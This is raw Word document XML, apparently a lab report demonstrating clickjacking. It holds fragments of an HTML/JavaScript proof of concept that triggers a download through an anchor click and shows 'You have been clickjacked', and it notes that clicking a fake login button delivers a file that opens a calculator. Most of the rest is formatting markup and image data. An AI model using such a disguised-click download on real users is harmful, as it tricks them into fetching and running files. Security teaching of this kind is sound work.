              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>anchor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>click</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">();             </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>window</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>revokeObjectURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">(); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C4608E4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="14"/>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script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55CFF43C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="16"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">    You have been clickjacked </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D997D0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="16"/>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D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A1BD43" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F72CA06"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17632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6316E0B4" wp14:editId="7FB757F1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44516" name="Group 4451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40" name="Shape 499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1" name="Shape 499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42" name="Shape 499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3" name="Shape 499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44" name="Shape 499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16" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49945" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49946" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49947" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49948" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4994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18656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37B5B0BD" wp14:editId="504A039F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44517" name="Group 4451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50" name="Shape 499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1" name="Shape 499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2" name="Shape 499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3" name="Shape 499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4" name="Shape 499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17" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49955" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49956" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49957" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49958" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4995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This is how it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> likes when the user clicks on the login button </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BD2684" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:left="40" w:right="-777"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4279D71C" wp14:editId="573E19AC">
                <wp:extent cx="5961279" cy="3926307"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="44515" name="Group 44515"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5961279" cy="3926307"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5961279" cy="3926307"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5176" name="Rectangle 5176"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="431546" y="0"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3A571C3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5177" name="Rectangle 5177"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3409823"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="02AFD78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5178" name="Rectangle 5178"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="431546" y="3574415"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="201EDE51"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5179" name="Rectangle 5179"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="431546" y="3777107"/>
                            <a:ext cx="4243560" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4A1DD8EE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve">On opening the </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>file</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> we get a working calculator</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="5180" name="Rectangle 5180"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3623437" y="3777107"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="125C1A75"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5183" name="Picture 5183"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId103"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="186770"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="5184" name="Shape 5184"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="17407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79D71C" id="Group 44515" o:spid="_x0000_s1311" style="width:469.4pt;height:309.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59612,39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cOfVeAQAAHERAAAOAAAAZHJzL2Uyb0RvYy54bWzkWG1v2zYQ/j5g&#10;/0HQ98Z6tSwhTjE0a1BgWIO+/ACapixhFCmQdOzs1++OL7Ibu0uWAk2xBohMicfj3XN34nO6fL0f&#10;eHTHlO6lWMbpRRJHTFC57sVmGX/+9PbVIo60IWJNuBRsGd8zHb+++vWXy93YsEx2kq+ZikCJ0M1u&#10;XMadMWMzm2nasYHoCzkyAZOtVAMxcKs2s7UiO9A+8FmWJPPZTqr1qCRlWsPTazcZX1n9bcuoed+2&#10;mpmIL2OwzdirstcVXmdXl6TZKDJ2PfVmkGdYMZBewKaTqmtiSLRV/YmqoadKatmaCyqHmWzbnjLr&#10;A3iTJg+8uVFyO1pfNs1uM04wAbQPcHq2Wvrn3Y0aP463CpDYjRvAwt6hL/tWDfgLVkZ7C9n9BBnb&#10;m4jCw7Kep1lVxxGFubzO5nlSOVBpB8ifrKPd74+snIWNZ1+YsxshQfQBA/1tGHzsyMgstLoBDG5V&#10;1K/Bm7Sax5EgA2TqB8gdIjacRfaphcfKTmDpRgNuZ5Aq8rQsQNEZuMoyh4pAsNJ6UeRzxGrymDSj&#10;0uaGySHCwTJWYINNK3L3hzZONIjgvlzgVci3PeduFp8AcME0HJn9am+9S2Fr78ZKru/B506qv99D&#10;9bZc7pax9KMYCxp2x9k44u8EYI21EwYqDFZhoAx/I22FOXt+2xrZ9tZgtMDt5g2DIGKmfZ9oVmej&#10;aTMUTYDIPx7Nsk7rLHXhzIukXmS5y/CpBsq6yF8uqPXPFlQooDMlOuX2k4J6VKJ5WRVFWv5IMS3s&#10;wXQonf9/ocIJciamU2r/55hWVZWGkyjUaZEVeTmHN9kLvX6L9Cer1AVgfRpVeOpPoSdFNZ9neZHD&#10;ixwJxrmwli96phZZ8Oalz9Sxpw38e5YIoxOG9DibhlVmq1jslQxP0jEQ9dd2fAWEdiSmX/W8N/eW&#10;nAN1QaPE3W1PkSjhDcR8IlsLODVdfoAA7gtUC55BdgRJXIfEBu+/ULPi/YisB/kGjr3BwOwfMOMz&#10;PjvWfS3pdmDCuDZCMQ62S6G7ftRxpBo2rBgwQvVubauWNNooZmiHG7awMdJDtOxowlp5MAxt/gpB&#10;BMqcQG0gC1zMq8q3IeE9VS6qvCr9eyrPk7xO7On0XJ5o7XKW2CEY9t0Y2KIIIbaMGwNchIJ5Uvl7&#10;mKoiOYWprtMDTFmdn8BEt45OY9AChYYebe3INDzrwojuRRgi6f7XdhGyHNehUhxGQJ3Lhbelg5dU&#10;7kzB+QE49SdpJc2hFwoSLn8OMlwcy0468cXndboVQS78jlb3sbzNKMiXIBF+naTD9KEM5VIztwG6&#10;ZXN7chV0HYPJBXqdlQWmMSXQuLdQP7ZVgZ5VrIOdnvO75EM+o809Z4gHFx9YC20J9JCpXafVZvWG&#10;q+iOYCNh/zBRrBMgimtc3flVyVdXoSjhY0e8Lq/Gb2BVek0oyexXgskYr5Z6a9ynAmi4wc/wwQBM&#10;mhZZs6Qw03oBnznshkfeHogcOoR3tgmyDS709dYi/w0CPxwc31v5w5eSq38AAAD//wMAUEsDBAoA&#10;AAAAAAAAIQAlYMm3J2cAACdnAAAUAAAAZHJzL21lZGlhL2ltYWdlMS5qcGf/2P/gABBKRklGAAEB&#10;AQBgAGAAAP/bAEMAAwICAwICAwMDAwQDAwQFCAUFBAQFCgcHBggMCgwMCwoLCw0OEhANDhEOCwsQ&#10;FhARExQVFRUMDxcYFhQYEhQVFP/bAEMBAwQEBQQFCQUFCRQNCw0UFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFP/AABEIAh4D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vT7b7bfW8MnR3zXptnaxW&#10;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